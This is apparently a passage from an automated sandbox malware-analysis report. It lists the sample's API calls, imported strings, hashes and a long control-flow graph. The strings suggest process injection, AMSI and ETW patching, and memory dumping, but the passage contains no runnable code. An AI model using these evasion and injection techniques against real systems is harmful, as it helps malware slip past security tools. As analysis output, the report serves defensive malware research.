                                                                                                                    • Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
                                                                                                                    • Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02EE7380,02E8B7B8,UacInitialize,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E892A4
                                                                                                                    • Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67
                                                                                                                    • Part of subcall function 02E7DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
                                                                                                                    • Part of subcall function 02E7DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
                                                                                                                    • Part of subcall function 02E7DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
                                                                                                                    • Part of subcall function 02E7DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B
                                                                                                                    • Part of subcall function 02E78338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4
                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,Initialize,02EE7380,02E8B7B8,00000000,00000000,00000000,ScanString,02EE7380,02E8B7B8), ref: 02E8B2FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                  • Opcode ID: 7d196204680c46157eaa31a909725559e1aaad1ad18e80bd8dfc69a46b04cde8
                                                                                                                  • Instruction ID: ec7bab9ea24036e1d95b12a1c66174ed2319c9c4bd33747d3a7193346545a962
                                                                                                                  • Opcode Fuzzy Hash: 7d196204680c46157eaa31a909725559e1aaad1ad18e80bd8dfc69a46b04cde8
                                                                                                                  • Instruction Fuzzy Hash: 3B430934AC021D8BDB21FB64DC849EE73BAEB85344F50E1A5B04DEB254DA70AE91CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 7740 2e83e12-2e85525 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7f094 call 2e64860 call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7e358 call 2e64de0 call 2e64764 call 2e64de0 call 2e7dc8c Sleep call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e788b8 call 2e649a0 call 2e63244 call 2e7e678 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 Sleep call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e77c10 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e77c10 call 2e7894c call 2e788b8 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7e358 call 2e64de0 call 2e64764 call 2e64de0 call 2e7dc8c call 2e788b8 call 2e7f094 call 2e647ec call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e788b8 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e788b8 call 2e7e358 call 2e64de0 call 2e64764 call 2e64de0 call 2e7dc8c call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e788b8 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 Sleep call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e649a0 call 2e64d74 call 2e7dc04 call 2e649a0 call 2e64d74 call 2e7dc04 call 2e649a0 call 2e64d74 call 2e7dc04 call 2e649a0 call 2e64d74 call 2e7dc04 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64d74 call 2e7dc04 call 2e64d74 call 2e7dc04 call 2e64d74 8425 2e85530-2e85b02 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7e398 call 2e64530 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e67acc call 2e7f16c call 2e64530 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7f094 call 2e7f108 call 2e64530 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 7740->8425 8426 2e8552b call 2e7dc04 7740->8426 8596 2e85b07-2e85d82 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 8425->8596 8426->8425 8669 2e87568-2e877e3 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 8596->8669 8670 2e85d88-2e85dcd call 2e64860 call 2e649a0 call 2e646d4 call 2e67e5c 8596->8670 8815 2e88318-2e88517 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 8669->8815 8816 2e877e9-2e87e3b call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e647ec call 2e649a0 call 2e785bc call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e649a0 call 2e646d4 call 2e7adf8 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e636d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 8669->8816 8670->8669 8688 2e85dd3-2e864db call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 8670->8688 9340 2e864e0-2e864e1 call 2e785bc 8688->9340 8993 2e8851d-2e886f0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e647ec call 2e649a0 call 2e64d74 call 2e64df0 CreateProcessAsUserW 8815->8993 8994 2e893a1-2e89524 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 8815->8994 9585 2e87e3d-2e87e40 8816->9585 9586 2e87e42-2e88104 call 2e75aec call 2e64bcc call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e649f8 call 2e77e50 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7b118 8816->9586 9206 2e8876e-2e88879 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 8993->9206 9207 2e886f2-2e88769 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 8993->9207 9172 2e8952a-2e89539 call 2e648ec 8994->9172 9173 2e89cf5-2e89d60 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 8994->9173 9172->9173 9188 2e8953f-2e89812 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7f094 call 2e64860 call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e67e5c 9172->9188 9239 2e89d65-2e89d6c call 2e789d0 9173->9239 9609 2e89818-2e89ade call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7e358 call 2e64530 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64de0 * 2 call 2e64764 9188->9609 9610 2e89aef-2e89b5a call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 9188->9610 9364 2e8887b-2e8887e 9206->9364 9365 2e88880-2e88ba0 call 2e649f8 call 2e7de50 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7d164 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 9206->9365 9207->9206 9251 2e89d71-2e89e8b call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 9239->9251 9418 2e89e90-2e89e97 call 2e789d0 9251->9418 9350 2e864e6-2e86551 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 9340->9350 9411 2e86556-2e8655d call 2e789d0 9350->9411 9364->9365 9897 2e88bb9-2e892c0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 ResumeThread call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 CloseHandle call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78080 call 2e7894c * 6 CloseHandle 9365->9897 9898 2e88ba2-2e88bb4 call 2e78730 9365->9898 9421 2e86562-2e866e5 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 9411->9421 9428 2e89e9c-2e89ebe call 2e646d4 * 2 9418->9428 9653 2e86949-2e869b4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 9421->9653 9654 2e866eb-2e86938 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e64d74 call 2e64de0 call 2e64764 9421->9654 9450 2e89ec3-2e89eca call 2e789d0 9428->9450 9460 2e89ecf-2e89ef1 call 2e646d4 * 2 9450->9460 9477 2e89ef6-2e89efd call 2e789d0 9460->9477 9488 2e89f02-2e89f24 call 2e646d4 * 2 9477->9488 9508 2e89f29-2e89f30 call 2e789d0 9488->9508 9519 2e89f35-2e89fa0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 9508->9519 9578 2e89fa5-2e89fac call 2e789d0 9519->9578 9589 2e89fb1-2e8a0cb call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 9578->9589 9585->9586 10131 2e88109-2e88120 call 2e63700 9586->10131 9798 2e8a0d0-2e8a0d7 call 2e789d0 9589->9798 10138 2e89ae3-2e89aea call 2e7dc8c 9609->10138 9686 2e89b5f-2e89b66 call 2e789d0 9610->9686 9734 2e869b9-2e869c0 call 2e789d0 9653->9734 10103 2e8693d-2e86944 call 2e7dc8c 9654->10103 9701 2e89b6b-2e89ce4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e649f8 9686->9701 10009 2e89ce9-2e89cf0 call 2e78d70 9701->10009 9749 2e869c5-2e87040 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e636d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e62f08 call 2e67990 call 2e647ec call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e62f08 call 2e67990 call 2e647ec call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 9734->9749 10512 2e87045-2e87052 call 2e74dd4 9749->10512 9813 2e8a0dc-2e8a0fe call 2e646d4 * 2 9798->9813 9842 2e8a103-2e8a10a call 2e789d0 9813->9842 9856 2e8a10f-2e8a164 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 9842->9856 9927 2e8a169-2e8a170 call 2e789d0 9856->9927 10586 2e892c5-2e8939c call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 9897->10586 9898->9897 9942 2e8a175-2e8a197 call 2e646d4 * 2 9927->9942 9971 2e8a19c-2e8a1a3 call 2e789d0 9942->9971 9980 2e8a1a8-2e8a213 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 9971->9980 10061 2e8a218-2e8a21f call 2e789d0 9980->10061 10009->9173 10074 2e8a224-2e8a469 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 10061->10074 10301 2e8a46e-2e8a475 call 2e789d0 10074->10301 10103->9653 10138->9610 10306 2e8a47a-2e8a49c call 2e646d4 * 2 10301->10306 10319 2e8a4a1-2e8a4a8 call 2e789d0 10306->10319 10325 2e8a4ad-2e8a4cf call 2e646d4 * 2 10319->10325 10337 2e8a4d4-2e8a4db call 2e789d0 10325->10337 10344 2e8a4e0-2e8a502 call 2e646d4 * 2 